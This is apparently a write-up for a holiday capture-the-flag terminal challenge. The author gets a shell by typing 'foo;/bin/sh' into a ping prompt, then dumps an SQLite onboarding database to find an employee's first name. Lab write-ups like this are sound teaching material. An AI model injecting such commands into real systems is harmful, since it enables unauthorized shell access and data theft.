The Name Game
Location: Lobby
Problem
We just hired this new worker, Californian or New Yorker? Think he's making some new toy bag... My job is to make his name tag. Golly gee, I'm glad that you came, I recall naught but his last name! Use our system or your own plan, Find the first name of our guy "Chan!" -Bushy Evergreen To solve this challenge, determine the new worker's first name and submit to runtoanswer.
Hints
Minty Candycane introduces this terminal:
Can you help me? I'm in a bit of a fix.
I need to make a nametag for an employee, but I can't remember his first name.
Maybe you can figure it out using this Cranberry Pi terminal?
The Santa's Castle Onboarding System? I think it's written in PowerShell, if I'm not mistaken.
PowerShell itself can be tricky when handling user input. Special characters such as & and ; can be used to inject commands.
I think that system is one of Alabaster's creations.
He's a little ... obsessed with SQLite database storage.
I don't know much about SQLite, just the .dump command.
Minty also provides a link to a webpage on dumping a SQLite3 database: https://www.digitalocean.com/community/questions/how-do-i-dump-an-sqlite-database
Minty also provides a link to a webpage on PowerShell command injection: https://ss64.com/ps/call.html
Solution
This challenge calls for us to inject operating system commands through the text menu system. When you submit employee information through option #1, the system reports that data is being saved to a SQLite database. That's going to come in handy later.
==================================================================== = = = S A N T A ' S C A S T L E E M P L O Y E E O N B O A R D I N G = = = ==================================================================== Press 1 to start the onboard process. Press 2 to verify the system. Press q to quit. Please make a selection: 1 Welcome to Santa's Castle! At Santa's Castle, our employees are our family. We care for each other, and support everyone in our common goals. Your first test at Santa's Castle is to complete the new employee onboarding paperwork. Don't worry, it's an easy test! Just complete the required onboarding information below. Enter your first name. : Abe Enter your last name. : Lincoln Enter your street address (line 1 of 2). : 123 Street Enter your street address (line 2 of 2). : Enter your city. : Washington Enter your postal code. : 12345 Enter your phone number. : 2345678901 Enter your email address. : no@no.no Is this correct? Abe Lincoln 123 Street Washington, 12345 2345678901 no@no.no y/n: y Save to sqlite DB using command line Press Enter to continue...:
Option #2 allows you to enter an IP address that the system will use as an argument when running the ping command. On the back end, the system executes ping $ipaddr, so if we add a semi-colon the system might execute whatever we type next as a separate command.
==================================================================== = = = S A N T A ' S C A S T L E E M P L O Y E E O N B O A R D I N G = = = ==================================================================== Press 1 to start the onboard process. Press 2 to verify the system. Press q to quit. Please make a selection: 2 Validating data store for employee onboard information. Enter address of server: foo;/bin/sh ping: unknown host foo $ id uid=1000(elf) gid=1000(elf) groups=1000(elf)
I entered foo;/bin/sh, which resulted in the system executing ping foo and then /bin/sh, and I got a shell prompt back. Let's see what we can find.
$ ls -la total 5480 drwxr-xr-x 1 elf elf 4096 Dec 27 00:27 . drwxr-xr-x 1 root root 4096 Dec 14 16:17 .. -rw-r--r-- 1 elf elf 220 Aug 31 2015 .bash_logout -rw-r--r-- 1 root root 95 Dec 14 16:13 .bashrc drwxr-xr-x 3 elf elf 4096 Dec 27 00:23 .cache drwxr-xr-x 3 elf elf 4096 Dec 27 00:23 .local -rw-r--r-- 1 root root 3866 Dec 14 16:13 menu.ps1 -rw-rw-rw- 1 root root 24576 Dec 27 00:25 onboard.db -rw-r--r-- 1 elf elf 655 May 16 2017 .profile -rwxr-xr-x 1 root root 5547968 Dec 14 16:13 runtoanswer -rw------- 1 elf elf 33 Dec 27 00:27 .sqlite_history
There's an SQLite database in the user elf's home directory. We can open that with the sqlite3 tool and query the data for the answer to this challenge.
$ sqlite3
SQLite version 3.11.0 2016-02-15 17:29:24
Enter ".help" for usage hints.
Connected to a transient in-memory database.
Use ".open FILENAME" to reopen on a persistent database.
sqlite> .open onboard.db
sqlite> .schema
CREATE TABLE onboard (
id INTEGER PRIMARY KEY,
fname TEXT NOT NULL,
lname TEXT NOT NULL,
street1 TEXT,
street2 TEXT,
city TEXT,
postalcode TEXT,
phone TEXT,
email TEXT
);
sqlite> select * from onboard where lname = "Chan";
84|Scott|Chan|48 Colorado Way||Los Angeles|90067|4017533509|scottmchan90067@gmail.com
sqlite> .quit
$ runtoanswer
Loading, please wait......
Enter Mr. Chan's first name: Scott
.;looooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooool:'
'ooooooooooookOOooooxOOdodOOOOOOOdoxOOdoooooOOkoooooooxO000Okdooooooooooooo;
'oooooooooooooXMWooooOMMxodMMNKKKKxoOMMxoooooWMXoooookNMWK0KNMWOooooooooooooo;
:oooooooooooooXMWooooOMMxodMM0ooooooOMMxoooooWMXooooxMMKoooooKMMkooooooooooooo
coooooooooooooXMMMMMMMMMxodMMWWWW0ooOMMxoooooWMXooooOMMkoooookMM0ooooooooooooo
coooooooooooooXMWdddd0MMxodMM0ddddooOMMxoooooWMXooooOMMOoooooOMMkooooooooooooo
coooooooooooooXMWooooOMMxodMMKxxxxdoOMMOkkkxoWMXkkkkdXMW0xxk0MMKoooooooooooooo
cooooooooooooo0NXooookNNdodXNNNNNNkokNNNNNNOoKNNNNNXookKNNWNXKxooooooooooooooo
cooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
cooooooooooooooooooooooooooooooooooMYcNAMEcISooooooooooooooooooooooooooooooooo
cddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddo
OMMMMMMMMMMMMMMMNXXWMMMMMMMNXXWMMMMMMWXKXWMMMMWWWWWWWWWMWWWWWWWWWMMMMMMMMMMMMW
OMMMMMMMMMMMMW: .. ;MMMk' .NMX:. . .lWO d xMMMMMMMMMMMW
OMMMMMMMMMMMMo OMMWXMMl lNMMNxWK ,XMMMO .MMMM. .MMMMMMM, .MMMMMMMMMMMMMMMW
OMMMMMMMMMMMMX. .cOWMN 'MMMMMMM; WMMMMMc KMMM. .MMMMMMM, .MMMMMMMMMMMMMMMW
OMMMMMMMMMMMMMMKo, KN ,MMMMMMM, WMMMMMc KMMM. .MMMMMMM, .MMMMMMMMMMMMMMMW
OMMMMMMMMMMMMKNMMMO oM, dWMMWOWk cWMMMO ,MMMM. .MMMMMMM, .MMMMMMMMMMMMMMMW
OMMMMMMMMMMMMc ... cWMWl. .. .NMk. .. .oMMMMM. .MMMMMMM, .MMMMMMMMMMMMMMMW
xXXXXXXXXXXXXXKOxk0XXXXXXX0kkkKXXXXXKOkxkKXXXXXXXKOKXXXXXXXKO0XXXXXXXXXXXXXXXK
.oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo,
.looooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo,
.,cllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllc;.
Congratulations!
Answer: Scott